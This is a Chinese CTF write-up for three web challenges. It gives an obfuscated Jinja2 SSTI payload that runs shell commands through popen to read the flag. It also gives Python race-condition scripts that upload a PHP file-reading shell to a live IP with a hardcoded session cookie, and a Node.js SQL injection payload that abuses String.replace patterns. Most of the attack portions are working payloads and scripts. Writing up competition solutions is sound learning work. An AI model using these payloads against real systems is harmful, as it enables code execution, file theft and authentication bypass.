目录

Rank-l

Rank-U

sqli or not

---

Rank-l

username存在报错回显，发现可以打SSTI

本地起一个服务，折半查找fuzz黑名单，不断扔给fenjing去迭代改payload

from flask import Flask, request, render_template_stringapp = Flask(__name__)@app.route('/input', methods=['GET', 'POST'])
def user_input():if request.method == 'POST':# 从POST请求的表单数据中获取用户输入user_input = request.form.get('user_input', '')# 检查输入中是否包含不允许的符号if any(char in user_input for char in ['+', '/', '*','"','\\','{%','%}','urlencode','mod']):return "输入中包含不允许的字符。", 400  # 返回错误信息# 如果输入不包含不允许的符号，使用render_template_stringtemplate = "<h1>用户输入的内容是：{{ input }}</h1>"return render_template_string(template, input=user_input)# 如果是GET请求，显示一个表单return '''<form method="POST"><label for="user_input">请输入内容：</label><input type="text" id="user_input" name="user_input"><button type="submit">提交</button></form>'''if __name__ == '__main__':app.run(host="0.0.0.0",port=1338,debug=True)

 

payload:

{{cycler.next.__globals__.__builtins__.__import__('os').popen(lipsum['__glob''al''s__']['__builti''ns__']['chr'](37).__add__('c').__mul__(7)|format(116,97,99,32,47,102,42)).read()}}

Rank-U

burpsuite默认字典爆出密码(302的很多都可以登)

登进去是一个任意文件上传，上传后访问是404，文件被立刻删除

打条件竞争

import requestswhile True:burp0_url = "http://139.155.126.78:30675/admin/index.php"  # 更新 URLburp0_cookies = {"PHPSESSID": "bsgq3v7goubrk1ciepr0se2dfc"}  # 更新 PHP 会话 IDburp0_data = ("------WebKitFormBoundarygIbPTT5pJVbv72RS\r\n""Content-Disposition: form-data; name=\"file_upload\"; filename=\"yjh3.php\"\r\n""Content-Type: application/octet-stream\r\n\r\n""<?php echo file_get_contents('/flag');?>\r\n"  # 改为新代码"------WebKitFormBoundarygIbPTT5pJVbv72RS--\r\n")# 发送 POST 请求，只保留 Cookier = requests.post(burp0_url, cookies=burp0_cookies, data=burp0_data)# 提取文件名并保存到本地文件try:filename = r.text.split('./Uploads/1f14bba00da3b75118bc8dbf8625f7d0/')[1].split('</p>')[0]with open('name.txt', 'w') as file:file.write(filename.strip())  # 使用 strip() 去除可能的换行符except IndexError:print("无法提取文件路径或文件上传失败")

import requestsurl0 = 'http://139.155.126.78:30675/admin/Uploads/1f14bba00da3b75118bc8dbf8625f7d0/'while True:# 直接读取文件内容，去除换行符并逐行处理with open('name.txt', 'r') as file:for filename in file:shellpath = url0 + filename.strip()  # 使用 strip() 去除换行符# 发起 GET 请求r1 = requests.get(shellpath)# 如果状态码不是 404，输出状态码和响应文本if r1.status_code != 404:print(r1.status_code)print(r1.text)

第一个脚本多运行几个，同时用第二个脚本读到flag

sqli or not

逗号的绕过参考ctfshow web344

【Web】Ctfshow Nodejs刷题记录_ctfshowweb nodejs-CSDN博客

replace的绕过参考

String.prototype.replace() - JavaScript | MDN

引号被ban只要用前面自带的引号就行

本地搭一个服务查看替换后拼接的sql语句，发现成功闭合

var express = require('express');
var app = express(); // 使用 app 而不是 router 来启动服务
var router = express.Router();
module.exports = router;app.use(router);router.get('/', (req, res, next) => {if (req.query.info) {if (req.url.match(/\,/ig)) {res.end('hacker1!');}var info = JSON.parse(req.query.info);// 合并所有信息并一次性回显let responseContent = `Parsed info: ${JSON.stringify(info)}<br>`;if (info.username && info.password) {var username = info.username;var password = info.password;if (info.username.match(/\'|\"|\\/) || info.password.match(/\'|\"|\\/)) {responseContent += 'hacker2!<br>';}var sql = "select * from userinfo where username = '{username}' and password = '{password}'";sql = sql.replace("{username}", username);sql = sql.replace("{password}", password);// 合并生成的 SQL 查询语句responseContent += `Generated SQL: ${sql}<br>`;} else {responseContent += "please input the data<br>";}// 一次性回显所有内容res.send(responseContent);} else {res.end("please input the data");}
});// 指定端口启动服务器
const port = 4000;  // 设置端口为 4000
app.listen(port, () => {console.log(`Server running on port ${port}`);
});

 payload:

?info={"username":"$`+or+1=1--+"&info="password":"123456"}

打入，下载flag文件